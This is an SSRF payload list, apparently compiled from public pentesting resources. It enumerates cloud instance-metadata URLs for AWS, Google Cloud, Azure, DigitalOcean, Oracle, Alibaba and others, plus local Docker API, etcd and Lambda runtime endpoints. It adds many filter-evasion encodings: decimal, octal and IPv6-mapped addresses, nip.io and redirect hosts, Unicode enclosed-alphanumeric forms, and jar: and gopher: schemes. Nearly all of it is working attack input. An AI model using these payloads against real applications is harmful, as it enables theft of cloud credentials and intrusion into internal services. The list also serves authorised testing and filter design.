# Sources: # - https://gist.githubusercontent.com/jhaddix/78cece26c91c6263653f31ba453e273b/raw/a4869d58a5ce337d1465c2d1b29777b9eecd371f/cloud_metadata.txt # - https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf # - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery # - https://github.com/assetnote/blind-ssrf-chains ## AWS # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories # # To fully protect, use IMDSv2 (see https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/) http://instance-data/latest/ http://169.254.169.254/latest/ # Common evasion techniques: http://2852039166/latest/ http://025177524776/latest/ http://0251.0376.0251.0376/latest/ http://[::ffff:a9fe:a9fe]/latest/ http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/ http://[0:0:0:0:0:ffff:169.254.169.254]/latest/ http://169.254.169.254.nip.io/latest/ http://nicob.net/redir-http-169.254.169.254:80- # http://127.0.0.1 http://2130706433/ # http://192.168.0.1 http://3232235521/ # http://192.168.1.1 http://3232235777/ # http://169.254.169.254 http://2852039166/ # IPv6 base http://[::]: # AWS ECS http://169.254.170.2/v2 ## Google Cloud # https://cloud.google.com/compute/docs/metadata # - Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" http://169.254.169.254/computeMetadata/v1/ http://metadata.google.internal/computeMetadata/v1/ http://metadata/computeMetadata/v1/ # Common evasion techniques: http://2852039166/computeMetadata/v1/ http://[::ffff:a9fe:a9fe]/computeMetadata/v1/ http://[0:0:0:0:0:ffff:a9fe:a9fe]/computeMetadata/v1/ http://[0:0:0:0:0:ffff:169.254.169.254]/computeMetadata/v1/ http://169.254.169.254.nip.io/computeMetadata/v1/ # Google allows recursive pulls http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true ## Google # Beta does NOT require a header atm http://metadata.google.internal/computeMetadata/v1beta1/ ## Digital Ocean # https://developers.digitalocean.com/documentation/metadata/ http://169.254.169.254/metadata/v1.json # This other prefix will be used from Azure: http://169.254.169.254/metadata/v1/ ## Packetcloud https://metadata.packet.net/userdata ## Azure # # To be effective, these also have to: # # - contain the header Metadata: true # - not contain an X-Forwarded-For header http://169.254.169.254/metadata/v1/ http://169.254.169.254/metadata/instance?api-version=2017-04-02 http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text # Common evasion techniques: http://2852039166/metadata/v1/ http://[::ffff:a9fe:a9fe]/metadata/v1/ http://[0:0:0:0:0:ffff:a9fe:a9fe]/metadata/v1/ http://[0:0:0:0:0:ffff:169.254.169.254]/metadata/v1/ http://169.254.169.254.nip.io/metadata/v1/ ## OpenStack/RackSpace http://169.254.169.254/openstack ## HP Helion # (header required? unknown) http://169.254.169.254/2009-04-04/meta-data/ ## Oracle Cloud http://192.0.0.192/latest/ ## Alibaba http://100.100.100.200/latest/meta-data/ # Rancher metadata http://rancher-metadata/ # Local Docker http://127.0.0.1:2375 http://2130706433:2375/ http://[::]:2375/ http://[0000::1]:2375/ http://[0:0:0:0:0:ffff:127.0.0.1]:2375/ http://2130706433:2375/ http://017700000001:2375/ http://0x7f000001:2375/ http://0xc0a80014:2375/ # Kubernetes etcd http://127.0.0.1:2379 # Enclosed alphanumerics http://169。254。169。254 http://169。254。169。254 http://⑯⑨。②⑤④。⑯⑨。②⑤④ http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ http://②⑧⑤②⓪③⑨①⑥⑥ http://④②⑤。⑤①⓪。④②⑤。⑤①⓪ http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥ http://⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥ http://[::①⑥⑨。②⑤④。⑯⑨。②⑤④] http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④] http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧ http://⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥② http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥② http://⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧ # Java only blind ssrf jar:http://127.0.0.1!/ jar:https://127.0.0.1!/ jar:ftp://127.0.0.1!/ # Other PL1 protocols gopher://127.0.0.1 gopher://localhost # AWS Lambda http://localhost:9001/2018-06-01/runtime/